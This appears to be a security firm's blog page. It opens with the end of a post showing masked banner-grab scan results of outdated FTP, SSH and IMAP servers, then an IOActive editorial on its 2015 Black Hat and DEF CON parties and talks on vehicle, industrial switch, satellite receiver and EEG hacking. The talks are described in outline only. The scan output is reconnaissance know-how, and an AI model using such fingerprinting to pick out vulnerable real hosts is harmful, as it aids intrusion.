x.x.x.10:21 -> 220 ProFTPD 1.3.5 Server ready.
x.x.x.9:22 -> SSH-2.0-OpenSSH_5.3
x.x.x.9:21 -> 220 ProFTPD 1.3.3e Server ready.
x.x.x.17:21 (t/o: 0s)
x.x.x.11:22 -> SSH-2.0-OpenSSH_4.3
x.x.x.10:143 -> * OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE STARTTLS AUTH=PLAIN] Dovecot DA ready.
x.x.x.7:21 -> 220 Core FTP Server Version 1.2, build 369 Registered
x.x.x.11:21 -> 220———- Welcome to Pure-FTPd [privsep] [TLS] ———-
x.x.x.13:143 -> * OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE STARTTLS AUTH=PLAIN] Dovecot DA ready.
x.x.x.13:21 -> 220 ProFTPD 1.3.4d Server ready.
x.x.x.13:22 -> SSH-2.0-OpenSSH_4.3
x.x.x.14:22 -> SSH-2.0-OpenSSH_5.1p1 Debian-6ubuntu2
x.x.x.15:22 -> SSH-2.0-OpenSSH_5.1p1 Debian-6ubuntu2
x.x.x.16:22 -> SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2
x.x.x.18:22 -> SSH-2.0-OpenSSH_5.5p1 Debian-6+squeeze5
x.x.x.19:22 -> SSH-2.0-OpenSSH_4.3
x.x.x.19:21 -> 220———- Welcome to Pure-FTPd [privsep] [TLS] ———-
x.x.x.17:143 -> * OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE STARTTLS LOGINDISABLED] Dovecot (Ubuntu) ready.
x.x.x.21:22 -> SSH-2.0-OpenSSH_5.3
x.x.x.22:22 -> SSH-2.0-OpenSSH_4.3
x.x.x.25:22 -> SSH-2.0-OpenSSH_4.3
x.x.x.25:143 -> * OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE STARTTLS AUTH=PLAIN] Dovecot DA ready.
x.x.x.26:22 -> SSH-2.0-OpenSSH_4.3
x.x.x.27:143 -> * OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE STARTTLS AUTH=PLAIN] Dovecot DA ready.
x.x.x.26:143 -> * OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE STARTTLS AUTH=PLAIN] Dovecot DA ready.
x.x.x.27:22 -> SSH-2.0-OpenSSH_4.3
x.x.x.36:143 -> * OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE STARTTLS AUTH=PLAIN] Dovecot DA ready.
x.x.x.36:22 -> SSH-2.0-OpenSSH_5.3
x.x.x.38:22 -> SSH-2.0-OpenSSH_6.6p1 Ubuntu-2ubuntu1
x.x.x.40:22 -> SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1.2
x.x.x.17:22 (t/o: 5s)
x.x.x.35:22 (t/o: 5s)
x.x.x.37:22 (t/o: 5s)
x.x.x.239:22 -> SSH-2.0-OpenSSH_5.1p1 Debian-5
x.x.x.100:22 (t/o: 5s)
x.x.x.124:22 (t/o: 6s)
x.x.x.242:22 (t/o: 5s)

The tool can also do more than a passive banner grab. It includes other scan modes in which it tries to identify TLS servers by sending them a TLS NULL probe, and to identify HTTP servers.
Enjoy!

EDITORIAL | July 29, 2015

Black Hat and DEF CON: Hacks and Fun

The great annual experience of Black Hat and DEF CON starts in just a few days, and we here at IOActive have a lot to share. This year we have several groundbreaking hacking talks and fun activities that you won’t want to miss!

For Fun
Join IOActive for an evening of dancing

Our very own DJ Alan Alvarez is back – coming all the way from Mallorca to turn the House of Blues RED. Because no one prefunks like IOActive.
Wednesday, August 5th
6–9PM
House of Blues
Escape to the IOAsis – DEF CON style!
We invite you to escape the chaos and join us in our luxury suite at Bally’s for some fun and great networking.  
Friday, August 7th
12–6PM
Bally’s penthouse suite
·      Unwind with a massage 
·      Enjoy spectacular food and drinks 
·      Participate in discussions on the hottest topics in security 
·      Challenge us to a game of pool! 
FREAKFEST 2015
After a two year hiatus, we’re bringing back the party and taking it up a few notches. Join DJs Stealth Duck, Alan Alvarez, and Keith Myers as they get our booties shaking. All are welcome! This is a chance for the entire community to come together to dance, swim, laugh, relax, and generally FREAK out!
And what’s a FREAKFEST without freaks? We are welcoming the community to go beyond just dancing and get your true freak on.
Saturday, August 8th
10PM till you drop
Bally’s BLU Pool
For Hacks
Escape to the IOAsis – DEF CON style!
Join the IOActive research team for an exclusive sneak peek into the world of IOActive Labs. 
Friday, August 7th
12–6PM
Bally’s penthouse suite
 
Enjoy Lightning Talks with IOActive Researchers:
Straight from our hardware labs, our brilliant researchers will talk about their latest findings in a group of sessions we like to call IOActive Labs Presents:
·      Mike Davis & Michael Milvich: Lunch & Lab – an overview of the IOActive Hardware Lab in Seattle
·      Robert Erbes: Little Jenny is Export Controlled: When Knowing How to Type Turns 8th-graders into Weapons 
·      Vincent Berg: The PolarBearScan
·      Kenneth Shaw: The Grid: A Multiplayer Game of Destruction 
·      Andrew Zonenberg: The Anti Taco Device: Because Who Doesn’t Go to All This trouble? 
·      Sofiane Talmat: The Dark Side of Satellite TV Receivers 
·      Fernando Arnaboldi: Mathematical Incompetence in Programming Languages 
·      Joseph Tartaro: PS4: General State of Hacking the Console
·      Ilja Van Sprundel: An Inside Look at the NIC Minifilter
 
RSVP at https://www.eventbrite.com/e/ioactive-las-vegas-2015-tickets-17604087299
 
Black Hat/DEF CON
 
Speaker: Chris Valasek
Remote Exploitation of an Unaltered Passenger Vehicle
Black Hat: 3PM Wednesday, August 5, 2015
DEF CON: 2PM Saturday, August 8, 2015
In case you haven’t heard, Dr. Charlie Miller and I will be speaking at Black Hat and DEF CON about our remote compromise of a 2014 Jeep Cherokee (http://www.wired.com/2015/07/hackers-remotely-kill-jeep-highway/). While you may have seen media regarding the project, our presentation will examine the research at a much more granular level. Additionally, we have a few small bits that haven’t been talked about yet, including some unseen video, along with a 90-page white paper that will provide you with an abundance of information regarding vehicle security assessments. I hope to see you all there!
Speaker: Colin Cassidy
Switches get Stitches
Black Hat: 3PM Wednesday, August 5, 2015
DEF CON: 4PM Saturday, August 8, 2015
Have you ever stopped to think about the network equipment between you and your target? Yeah, we did too. In this talk we will be looking at the network switches that are used in industrial environments, like substations, factories, refineries, ports, or other homes of industrial automation. In other words: DCS, PCS, ICS, and SCADA switches.
We’ll be attacking the management plane of these switches because we already know that most ICS protocols lack authentication and cryptographic integrity. By compromising the switches, an attacker can perform MITM attacks on live processes.

Not only will we reveal new vulnerabilities, along with the methods and techniques for finding them, we will also share defensive techniques and mitigations that can be applied now, to protect against the average 1-3 year patching lag (or even worse, “forever-day” issues that are never going to be patched).

 

Speaker: Damon Small
Beyond the Scan: The Value Proposition of Vulnerability Assessment
DEF CON: 2PM Thursday, August 6, 2015
It is a privilege to have been chosen to present at DEF CON 23. My presentation, “Beyond the Scan: The Value Proposition of Vulnerability Assessment”, is not about how to scan a network; rather, it is about how to consume the data you gather effectively and how to transform it into useful information that will affect meaningful change within your organization.
As I state in my opening remarks, scanning is “Some of the least sexy capabilities in information security”. So how do you turn such a base activity into something interesting? Key points I will make include:
·      Clicking “scan” is easy. Making sense of the data is hard and requires skilled professionals. The tools you choose are important, but the people using them are critical.
·      Scanning a few, specific hosts once a year is a compliance activity and useful only within the context of the standard or regulation that requires it. I advocate for longitudinal studies where large numbers of hosts are scanned regularly over time. This reveals trends that allow the information security team to not only identify missing patches and configuration issues, but also to validate processes, strengthen asset management practices, and to support both strategic and tactical initiatives.

I illustrate these concepts using several case studies. In each, the act of assessing the network revealed information to the client that was unexpected, and valuable, “beyond the scan.”

 

Speaker: Fernando Arnaboldi
Abusing XSLT for Practical Attacks
Black Hat: 3:50PM Thursday, August 6, 2015
DEF CON: 2PM Saturday, August 8, 2015
XML and XML schemas (i.e., DTDs) are an interesting target for attackers. They may allow an attacker to retrieve internal files and abuse applications that rely on these technologies. Alongside these technologies there is a specific language created to manipulate XML documents that has gone largely unnoticed by attackers so far: XSLT.

XSLT is used to manipulate and transform XML documents. Since its definition, it has been implemented in a wide range of software (standalone parsers, programming language libraries, and web browsers). In this talk I will expose some security implications of using the most widely deployed version of XSLT.

 

Speaker: Jason Larsen
Remote Physical Damage 101 – Bread and Butter Attacks

Black Hat: 9AM Thursday, August 6, 2015

 

Speaker: Jason Larsen
Rocking the Pocket Book: Hacking Chemical Plant for Competition and Extortion

DEF CON:  6PM Friday, August 7, 2015

 

Speaker: Kenneth Shaw
The Grid: A Multiplayer Game of Destruction
DEF CON: 12PM Sunday, August 9, 2015, IoT Village, Bronze Room

Kenneth will host a table in the IoT Village at DEF CON where he will present a demo and explanation of vulnerabilities in the US electric grid.

 

Speaker: Sofiane Talmat
Subverting Satellite Receivers for Botnet and Profit
Black Hat: 5:30PM Wednesday, August 5, 2015
Security and the New Generation of Set Top Boxes
DEF CON: 2PM Saturday, August 8, 2015, IoT Village, Bronze Room
New satellite TV receivers are revolutionary. One of the devices used in this research is much more powerful than the computer I had when I graduated, running a Linux OS and featuring a 32-bit RISC processor at 450 MHz with 256 MB of RAM.

Satellite receivers are massively joining the IoT and are used to decrypt pay TV through card sharing attacks. However, they are far from being secure. In this upcoming session we will discuss their weaknesses, focusing on a specific attack that exploits both technical and design vulnerabilities, including the human factor, to build a botnet of Linux-based satellite receivers.

 

Speaker: Alejandro Hernandez
Brain Waves Surfing – (In)security in EEG (Electroencephalography) Technologies
DEF CON: 7-7:50PM Saturday, August 8, 2015, BioHacking Village, Bronze 4, Bally’s

Electroencephalography (EEG) is a non-invasive method for recording and studying the electrical activity of the brain (the synapses between neurons). It can be used to diagnose or monitor health conditions such as epilepsy, sleeping disorders, seizures, and Alzheimer’s disease, among other clinical uses. Brain signals are also used for many other research and entertainment purposes, such as neurofeedback, arts, and neurogaming.

 

I wish this were a talk on how to become Johnny Mnemonic, so you could store terabytes of data in your brain, but, sorry to disappoint you, I will only cover non-invasive EEG. I will cover the security 101 issues, ones we have all known about since the ’90s, that affect this 21st-century technology.

 

I will give a brief introduction of Brain-Computer Interfaces and EEG in order to understand the risks involved in brain signal processing, storage, and transmission. I will cover common (in)security aspects, such as encryption and authentication as well as (in)security in design. Also, I will perform some live demos, such as the visualization of live brain activity, sniffing of brain signals over TCP/IP, as well as software bugs in well-known EEG applications when dealing with corrupted brain activity files. This talk is a first step to demonstrating that many EEG technologies are vulnerable to common network and application attacks.